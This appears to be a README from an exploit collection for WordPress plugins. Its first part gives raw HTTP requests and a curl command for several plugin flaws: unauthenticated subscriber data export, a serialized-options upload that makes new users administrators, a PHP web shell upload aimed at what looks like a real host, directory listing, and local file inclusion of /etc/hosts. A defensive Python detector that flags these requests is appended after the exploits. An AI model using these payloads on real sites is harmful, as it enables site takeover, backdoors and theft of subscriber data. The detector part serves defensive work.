RandomRobbieBF/wordpress-exploits

wordpress-exploits

Random WordPress Exploits May or May Not Work.

CVE-2019-19985

Info

Description: Unauthenticated File Download w/ Information Disclosure
CVE ID: CVE-2019-19985
CVSS v3.0 Score: 5.8 (Medium)
CVSS Vector String: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
Affected Plugin: Email Subscribers & Newsletters
Plugin Slug: email-subscribers
Affected Versions: <= 4.2.2
Patched Version: 4.2.3

POC

GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=es_subscribers&action=export
Connection: close
Content-Length: 2

Info

Easy WP SMTP Plugin for WordPress 1.3.9 RCE/Add Admin

The popular Easy WP SMTP plugin, which has 300,000+ active installations, was prone to a critical zero-day vulnerability that allowed an unauthenticated user to modify WordPress options or to inject and execute code, among other malicious actions.

POC

The following proof of concept uses swpsmtp_import_settings to upload a file containing a malicious serialized payload that enables user registration (users_can_register) and sets the default user role (default_role) to “administrator” in the database.

1. Create a file named “/tmp/upload.txt” and add this content to it:

> a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

2. Upload the file:

> $ curl https://TARGET.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'

Info

The Cherry Plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in an attacker uploading backdoor shell scripts or downloading the wp-config.php file.

POC

POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1
Host: lovi.studio
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0
Content-Length: 522
Content-Type: multipart/form-data; boundary=db6aa92af633763a3f43abd6cde64077

--db6aa92af633763a3f43abd6cde64077
Content-Disposition: form-data; name="file"; filename="shell.php"

<?=`$_GET[0]`?>

Info

WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure

POC

POST /?es=export HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

option=view_all_subscribers

Download Manager < 2.6.3

POST /wp-admin/admin.php?task=wpdm_dir_tree HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.134/wp-admin/post-new.php?post_type=wpdmpro
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 33
Origin: http://192.168.1.134
Connection: close

dir=%2Fvar%2Fwww/html/wp-content/

Title: Arbitrary Shortcode Execution & Local File Inclusion
Product: WOOF - WooCommerce Products Filter (PluginUs.Net)
Vulnerable Version: 1.1.9
Fixed Version: 2.2.0

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress.lan
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 75
action=woof_redraw_woof&shortcode=woof_search_options&pagepath=/etc/hosts
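For the defensive side of the entries above, the following Python is an added example (not part of this repository) that parses raw HTTP requests in the form the PoCs use and labels the request pattern each entry describes: the `download_report` call made without a `wordpress_logged_in_` cookie (CVE-2019-19985), the `swpsmtp_import_settings` multipart field on admin-ajax.php, POSTs to the cherry-plugin upload endpoint (and a PHP filename in them), the `es=export` / `view_all_subscribers` dump, `wpdm_dir_tree` with an absolute or `..` path, and `woof_redraw_woof` with a path in `pagepath`. It is meant for replaying captured requests from a proxy or WAF log offline. The sample requests embedded in it are constructed for the example, `example.test` is a placeholder host, and the labels returned by `classify()` are the example's own names, not WordPress or plugin identifiers.

```python
"""Flag the WordPress plugin request patterns catalogued in this README.

Added example, not part of the repository: feed it raw HTTP requests (captured
from a reverse proxy or WAF log) and it names the pattern each one matches.
All sample requests below are constructed; example.test is a placeholder host.
"""
import re
from urllib.parse import parse_qs, urlsplit

# WordPress sets this cookie prefix after login; a wp-admin request without it
# is the unauthenticated access the advisories above describe.
WP_LOGIN_COOKIE = "wordpress_logged_in_"


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, merged params and headers."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in filter(None, lines[1:]):
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(url.query).items()}
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data"):
        # Field names and upload filenames are all the rules below need.
        params.update({n: "" for n in re.findall(r'(?<!file)name="([^"]+)"', body)})
        params["_filenames"] = ",".join(re.findall(r'filename="([^"]+)"', body))
    elif body.strip():
        # Treat any other body as urlencoded; the WOOF PoC above omits Content-Type.
        params.update({k: v[0] for k, v in parse_qs(body.strip()).items()})
    return {"method": method, "path": url.path, "params": params, "headers": headers}


def _escapes_webroot(value):
    """True for an absolute path or a parent-directory escape in a user-supplied path."""
    return value.startswith("/") or ".." in value


def classify(req):
    """Return the pattern labels the request matches; an empty list means nothing flagged."""
    p, path = req["params"], req["path"]
    logged_in = WP_LOGIN_COOKIE in req["headers"].get("cookie", "")
    hits = []
    if path.endswith("/wp-admin/admin.php") and p.get("page") == "download_report" and not logged_in:
        hits.append("CVE-2019-19985: unauthenticated email-subscribers report download")
    if path.endswith("/admin-ajax.php") and "swpsmtp_import_settings" in p:
        hits.append("easy-wp-smtp: settings import through admin-ajax")
    if path.endswith("/cherry-plugin/admin/import-export/upload.php"):
        hits.append("cherry-plugin: request to unauthenticated upload endpoint")
        if re.search(r"\.ph(p\d?|tml|ar)$", p.get("_filenames", ""), re.I):
            hits.append("cherry-plugin: PHP file in upload")
    if p.get("es") == "export" and p.get("option") == "view_all_subscribers":
        hits.append("email-subscribers 3.4.7: subscriber list export")
    if p.get("task") == "wpdm_dir_tree" and _escapes_webroot(p.get("dir", "")):
        hits.append("download-manager: wpdm_dir_tree path traversal")
    if p.get("action") == "woof_redraw_woof" and _escapes_webroot(p.get("pagepath", "")):
        hits.append("woof: woof_redraw_woof local file inclusion")
    return hits


def scan(samples):
    """Map each sample name to the labels classify() returned for it."""
    return {name: classify(parse_request(raw)) for name, raw in samples.items()}


# Constructed requests modelled on the PoCs above (hosts, cookies and bodies are placeholders).
SAMPLES = {
    "es_report": ("GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1\r\n"
                  "Host: example.test\r\nConnection: close\r\n\r\n"),
    "smtp": ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.test\r\n"
             "Content-Type: multipart/form-data; boundary=XX\r\n\r\n"
             "--XX\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nswpsmtp_clear_log\r\n"
             "--XX\r\nContent-Disposition: form-data; name=\"swpsmtp_import_settings\"\r\n\r\n1\r\n"
             "--XX\r\nContent-Disposition: form-data; name=\"swpsmtp_import_settings_file\"; "
             "filename=\"upload.txt\"\r\n\r\n(placeholder)\r\n--XX--\r\n"),
    "cherry": ("POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1\r\n"
               "Host: example.test\r\nContent-Type: multipart/form-data; boundary=XX\r\n\r\n"
               "--XX\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n\r\n"
               "(placeholder)\r\n--XX--\r\n"),
    "es_export": ("POST /?es=export HTTP/1.1\r\nHost: example.test\r\n"
                  "Content-Type: application/x-www-form-urlencoded\r\n\r\noption=view_all_subscribers"),
    "wpdm": ("POST /wp-admin/admin.php?task=wpdm_dir_tree HTTP/1.1\r\nHost: example.test\r\n"
             "Content-Type: application/x-www-form-urlencoded\r\n\r\ndir=%2Fvar%2Fwww/html/wp-content/"),
    "woof": ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.test\r\n\r\n"
             "action=woof_redraw_woof&shortcode=woof_search_options&pagepath=/etc/hosts"),
    # Same WOOF action used as the plugin intends: a logged-in user and a relative page path.
    "benign": ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.test\r\n"
               "Cookie: wordpress_logged_in_placeholder=editor\r\n\r\n"
               "action=woof_redraw_woof&shortcode=woof_search_options&pagepath=shop"),
}

if __name__ == "__main__":
    for name, hits in scan(SAMPLES).items():
        print(f"{name:10} {hits or ['clean']}")
```

The login-cookie check matters for the CVE-2019-19985 rule only: the advisory's point is that the report download worked without a session, so the same URL carrying a `wordpress_logged_in_` cookie is normal admin use and is left alone. The path rules treat an absolute path or any `..` as the signal because both plugins expect a location under the site's own tree.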
